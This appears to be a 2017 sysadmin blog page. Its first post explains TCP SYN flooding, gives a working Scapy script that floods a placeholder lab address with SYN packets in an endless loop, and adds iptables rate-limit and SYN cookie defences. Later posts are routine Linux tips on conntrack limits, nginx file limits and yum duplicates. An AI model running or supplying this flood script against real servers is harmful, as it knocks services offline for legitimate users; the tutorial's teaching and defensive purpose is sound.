Tuesday, October 24, 2017

SYN Flooding using SCAPY and Prevention using iptables

DoS (Denial of Service) attacks make Web services unavailable to legitimate users, hurting the website owner’s potential business. They work by deliberately consuming network, CPU and memory resources. In this article, I will demonstrate how to perform a SYN flood using the SCAPY framework, along with preventive measures using iptables.
Over time, DoS attacks have become more sophisticated, disguising malicious client requests as legitimate ones. A distributed approach, DDoS (Distributed Denial of Service), is now also common: many clients generate requests at once to create a flood. One type of DDoS flood attack is the TCP SYN queue flood.
A SYN queue flood attack takes advantage of the TCP protocol’s “three-way handshake”. A client sends a TCP SYN (S flag) packet to begin a connection to the server. The target server replies with a TCP SYN-ACK (SA flag) packet, but the client never answers it, leaving the TCP connection “half-open”. In normal operation, the client would send an ACK (A flag) packet followed by the data to be transferred, or an RST reply to reset the connection. The target server keeps the half-open connection in the “SYN_RECV” state, since the ACK may simply have been lost to network problems; by sending many such SYNs and never completing the handshake, an attacker fills the server’s SYN queue and blocks legitimate connections.
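As a demonstration, below is a minimal Scapy sketch of such a flood, intended only for a lab host you are authorized to test; the target address and port are placeholder assumptions.

#!/usr/bin/env python
# syn_flood.py - minimal SYN flood sketch with Scapy (lab use only)
from scapy.all import IP, TCP, RandShort, send

target_ip = "192.168.1.100"   # hypothetical lab target
target_port = 80              # hypothetical target port

# Build a TCP packet with only the SYN (S) flag set. RandShort()
# draws a new random source port each time the packet is re-sent,
# so every SYN opens a fresh half-open connection on the target.
pkt = IP(dst=target_ip) / TCP(sport=RandShort(), dport=target_port, flags="S")

# loop=1 re-sends the packet indefinitely; verbose=0 keeps it quiet.
send(pkt, loop=1, verbose=0)

Run it as root (Scapy needs raw sockets) and watch the half-open connections pile up on the target with "netstat -ant | grep SYN_RECV".
On the prevention side, one common iptables approach is to rate-limit incoming SYNs and enable SYN cookies; the thresholds below are illustrative and should be tuned to your traffic:
# sysctl -w net.ipv4.tcp_syncookies=1
# iptables -A INPUT -p tcp --syn -m limit --limit 10/s --limit-burst 20 -j ACCEPT
# iptables -A INPUT -p tcp --syn -j DROP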

Monday, October 23, 2017

How to Fix Nf_conntrack Table Full Dropping Packet

Issue

Packets are dropped on systems using ip_conntrack or nf_conntrack. The following messages appear in /var/log/kern on the CentOS nodes when one of the instances drops packets:
$ tail -f /var/log/kern
Jul  4 03:47:16 centos kernel: : nf_conntrack: table full, dropping packet
Jul  4 03:47:16 centos kernel: : nf_conntrack: table full, dropping packet
This can happen when you are under attack, but it is also very likely to happen on a busy server even when there is no malicious activity.
NOTE: By default, CentOS sets this maximum to 65,536 connections. This is enough for lightly loaded servers, but it can easily be exhausted on heavy-traffic servers.
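To confirm that you really are hitting the limit, compare the live entry count with the configured maximum (these sysctl names apply to nf_conntrack; older ip_conntrack kernels expose net.ipv4.netfilter.ip_conntrack_max instead):
# sysctl net.netfilter.nf_conntrack_count
# sysctl net.netfilter.nf_conntrack_max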

How to Fix
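A sketch of the usual fix, assuming the nf_conntrack module: raise the table maximum, and optionally shorten the established-connection timeout so stale entries expire sooner. The values below are illustrative; size them to your traffic and available memory.
Apply the new maximum immediately:
# sysctl -w net.netfilter.nf_conntrack_max=131072
Persist it (and, optionally, a shorter timeout) in /etc/sysctl.conf, then reload with "sysctl -p":
net.netfilter.nf_conntrack_max = 131072
net.netfilter.nf_conntrack_tcp_timeout_established = 86400
Because the kernel sizes the conntrack hash table separately, it is often recommended to raise the bucket count as well; a common rule of thumb is one bucket per four entries:
# echo 32768 > /sys/module/nf_conntrack/parameters/hashsize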

Sunday, October 22, 2017

Nginx: 24: Too Many Open Files Error And Solution

How do I fix this problem under CentOS / RHEL / Fedora Linux or UNIX-like operating systems?

Linux / UNIX sets soft and hard limits on the number of file handles and open files. You can use the ulimit command to view those limits. First switch to the nginx user (its login shell is often set to nologin on CentOS, so force a shell with -s):
su - nginx -s /bin/bash
To see the hard and soft values, issue the following commands:
ulimit -Hn
ulimit -Sn
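You can also check what the running nginx master process is actually allowed; the PID file path below is the usual CentOS default and may differ on your system:
# grep 'open files' /proc/$(cat /var/run/nginx.pid)/limits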

Increase Open FD Limit at Linux OS Level

Your operating system sets limits on how many files the nginx server can open. You can fix this problem by setting or increasing the system-wide open file limit under Linux. Edit /etc/sysctl.conf, enter:
# vi /etc/sysctl.conf
Append / modify the following line:
fs.file-max = 70000
Save and close the file. Edit /etc/security/limits.conf, enter:
# vi /etc/security/limits.conf
Set the soft and hard limits for the nginx user as follows:
nginx       soft    nofile   10000
nginx       hard    nofile   30000
Save and close the file. Finally, reload the sysctl changes with the sysctl command (the limits.conf changes apply at the next login session):
# sysctl -p
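The OS-level limit is only half of the fix: nginx can raise the limit for its own workers with the worker_rlimit_nofile directive. A minimal sketch for /etc/nginx/nginx.conf, mirroring the hard limit set above:

# /etc/nginx/nginx.conf (main context)
worker_rlimit_nofile 30000;

events {
    # keep worker_connections below worker_rlimit_nofile, since each
    # connection consumes at least one file descriptor
    worker_connections 10000;
}

Then reload nginx (for example with "service nginx reload" or "systemctl reload nginx", depending on your init system) so the new limits take effect.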

Sunday, October 15, 2017

yum, rpm and duplicate versions

Apparently, when a "yum update" fails miserably, you can end up with duplicate versions of packages in the RPM database. This seems harmless, but it is annoying. yum provides a tool to check for this, but I was not able to find anything that would automatically repair it. So here's a little tip:
$ yum check duplicates | awk '/is a duplicate/ {print $6}' > /tmp/DUPES
$ yum remove `cat /tmp/DUPES`
Of course, before you remove the dupes, examine the temp file (/tmp/DUPES) and make sure it looks OK.
Update:
There seems to be a command to do this: package-cleanup has an option for it, e.g.
$ package-cleanup --cleandupes
However, testing this command on a second box with the same problem gave bad results; it seems to have uninstalled the "real" packages too.
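If you do try it, note that package-cleanup ships with yum-utils, and it is safer to start with the read-only listing and review it before cleaning anything:
$ package-cleanup --dupes
The --dupes option only prints the duplicate packages; --cleandupes is the one that removes them, so treat it with the same caution as the manual yum remove above.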